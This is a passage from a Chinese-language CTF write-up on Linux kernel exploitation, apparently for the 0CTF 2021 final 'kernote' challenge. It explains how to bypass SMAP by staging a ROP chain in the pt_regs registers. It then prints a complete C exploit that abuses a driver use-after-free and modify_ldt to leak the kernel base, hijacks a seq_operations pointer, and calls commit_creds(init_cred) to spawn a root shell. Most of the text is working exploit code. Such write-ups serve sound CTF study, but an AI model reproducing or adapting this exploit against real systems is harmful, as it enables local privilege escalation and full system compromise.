                printf("\033[32m\033[1m[+] Found kernel base: \033[0m%p\n", kernel_base);
                printf("\033[32m\033[1m[+] Kernel offset: \033[0m%p\n", kernel_offset);
            }
        }
        write(pipe_fd[1], &kernel_base, 8);
        exit(0);
    }
    wait(NULL);
    read(pipe_fd[0], &kernel_base, 8);
    if (kernel_base)
    {
        kernel_offset = kernel_base - vmlinux_base;
        break;
    }
    search_addr += 0x1000;
    *(unsigned long long *)buf = search_addr;
}

下一步就跟刚刚一样我们要进行ROP，但是这道题恶心的地方的来了，这里开启了smap所以我们没法向上一道题目那样直接将ROP写在用户态，所以这里需要借助一个结构体pt_regs：

struct pt_regs {
    /*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
    /* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
    /*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
    /* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
    /* top of stack page */
};

可以看到这个结构体的所有成员都是以寄存器命名的，并且内核中处理系统调用的入口函数entry_SYSCALL_64的源码中存在一条这样的指令：

1	PUSH_AND_CLEAR_REGS rax=$-ENOSYSCopy

这条指令会将所有寄存器压入进内核的栈中，形成一个pt_reg结构体：

当我们劫持内核结构体中的某个函数指针时，在我们通过该函数指针劫持内核执行流时 rsp 与栈底的相对偏移通常是不变的，而在系统调用当中过程有很多的寄存器其实是不一定能用上的，比如 r8 ~ r15，这些寄存器为我们布置 ROP 链提供了可能。

综上，得出exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/prctl.h>

void save_status()
{
    __asm__("mov user_cs, cs\n"
            "mov user_ss, ss\n"
            "mov user_sp, rsp\n"
            "pushf\n"
            "pop user_rflags\n");
    puts("[*]status has been saved.");
}

void print_hex(char *buf, int size)
{
    int i;
    puts("======================================");
    printf("data :\n");
    for (i = 0; i < (size / 8); i++)
    {
        if (i % 2 == 0)
        {
            printf("%d", i / 2);
        }
        printf(" %16llx", *(size_t *)(buf + i * 8));
        if (i % 2 == 1)
        {
            printf("\n");
        }
    }
    puts("======================================");
}

void get_shell()
{
    system("/bin/sh");
}

struct user_desc
{
    unsigned int entry_number;
    unsigned int base_addr;
    unsigned int limit;
    unsigned int seg_32bit : 1;
    unsigned int contents : 2;
    unsigned int read_exec_only : 1;
    unsigned int limit_in_pages : 1;
    unsigned int seg_not_present : 1;
    unsigned int useable : 1;
    unsigned int lm : 1;
};

int fd;
size_t user_cs, user_ss, user_rflags, user_sp;
unsigned long add_rsp_pop_pop;
unsigned long pop_rdi;
unsigned long init_cred;
unsigned long commit_creds;
unsigned long swapgs;
unsigned long iretq;
unsigned long shell_addr;
unsigned long swapgs_restore_regs_and_return_to_usermode;
int seq_fd;

void create(unsigned long idx)
{
    ioctl(fd, 0x6667, idx);
}

void delete (unsigned long idx)
{
    ioctl(fd, 0x6668, idx);
}

void select(unsigned long idx)
{
    ioctl(fd, 0x6666, idx);
}

void edit(unsigned long buf)
{
    ioctl(fd, 0x6669, buf);
}

int main()
{
    signal(SIGSEGV, get_shell);
    save_status();
    fd = open("/dev/kernote", O_RDWR);
    if (fd < 0)
    {
        printf("[*]Error!");
        exit(0);
    }

    char *buf[0x100];
    char *tmp[0x100];
    unsigned long *info = malloc(0x2000);
    unsigned long vmlinux_base = 0xffffffff81000000;
    memset(info, 0, 0x2000);
    unsigned long kernel_base = 0;
    unsigned long kernel_offset;
    int pipe_fd[2] = {0};

    struct user_desc desc;
    desc.base_addr = 0xff0000;
    desc.entry_number = 0x1000 / 8;
    desc.limit = 0;
    desc.seg_32bit = 0;
    desc.contents = 0;
    desc.read_exec_only = 0;
    desc.limit_in_pages = 0;
    desc.seg_not_present = 0;
    desc.useable = 0;
    desc.lm = 0;

    create(0);
    select(0);
    delete (0);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
    memset(buf, 0, 0x100);
    unsigned long long addr = 0xffff888000000000;
    *(unsigned long *)buf = addr;
    while (1)
    {
        edit(*(unsigned long *)buf);
        int ret = syscall(SYS_modify_ldt, 0, tmp, 8);
        if (ret < 0)
        {
            addr += 0x40000000;
            *(uint64_t *)buf = addr;
            continue;
        }
        printf("page_offset_base: %p\n", addr);
        break;
    }
    unsigned long search_addr = addr;
    *(unsigned long long *)buf = search_addr;
    pipe(pipe_fd);
    while (1)
    {
        edit(*(unsigned long *)buf);
        if (!fork())
        {
            syscall(SYS_modify_ldt, 0, info, 0x1000);
            for (int i = 0; i < 0x1000 / 8; i++)
            {
                if (info[i] > vmlinux_base && (info[i] & 0xfff) == 0x040)
                {
                    kernel_base = info[i] - 0x40;
                    kernel_offset = kernel_base - vmlinux_base;
                    printf("\033[32m\033[1m[+] Found kernel base: \033[0m%p\n", kernel_base);
                    printf("\033[32m\033[1m[+] Kernel offset: \033[0m%p\n", kernel_offset);
                }
            }
            write(pipe_fd[1], &kernel_base, 8);
            exit(0);
        }
        wait(NULL);
        read(pipe_fd[0], &kernel_base, 8);
        if (kernel_base)
        {
            kernel_offset = kernel_base - vmlinux_base;
            break;
        }
        search_addr += 0x1000;
        *(unsigned long long *)buf = search_addr;
    }
    create(1);
    select(1);
    delete (1);
    seq_fd = open("/proc/self/stat", 0);
    add_rsp_pop_pop = 0xffffffff817c21a6 + kernel_offset;
    pop_rdi = 0xffffffff81075c4c + kernel_offset;
    init_cred = 0xffffffff8266b780 + kernel_offset;
    commit_creds = 0xffffffff810c9dd0 + kernel_offset;
    swapgs = 0xffffffff81078130 + kernel_offset;
    iretq = 0xffffffff810002df + kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00fba + kernel_offset;
    shell_addr = (uint64_t)get_shell;
    edit(add_rsp_pop_pop);

    __asm__(
        "mov r15,   0xbeefdead\n"
        "mov r14,   0xbeefdead\n"
        "mov r13,   pop_rdi\n"
        "mov r12,   init_cred\n"
        "mov rbp,   commit_creds\n"
        "mov rbx,   swapgs_restore_regs_and_return_to_usermode\n"
        "mov r11,   0xbeefdead\n"
        "mov r10,   0xbeefdead\n"
        "mov r9,    0xbeefdead\n"
        "mov r8,    0xbeefdead\n"
        "xor rax,   rax\n"
        "mov rcx,   0xbeefdead\n"
        "mov rdx,   8\n"
        "mov rsi,   rsp\n"
        "mov rdi,   seq_fd\n"
        "syscall");
    return 0;
}

题目放在：https://github.com/196082/196082

参考链接：https://arttnba3.cn/2021/10/31/CTF-0X05-TCTF2021_FINAL/#Step-I-%E6%B3%84%E9%9C%B2-page-offset-base-1

利用原理

例题演示

2022 蓝帽杯 半决赛 Smurfs

题目分析

利用过程

bypass kpti

综上，得出exp

0CTF 2021 final kernote

题目分析

利用分析

综上，得出exp

2022 蓝帽杯半决赛 Smurfs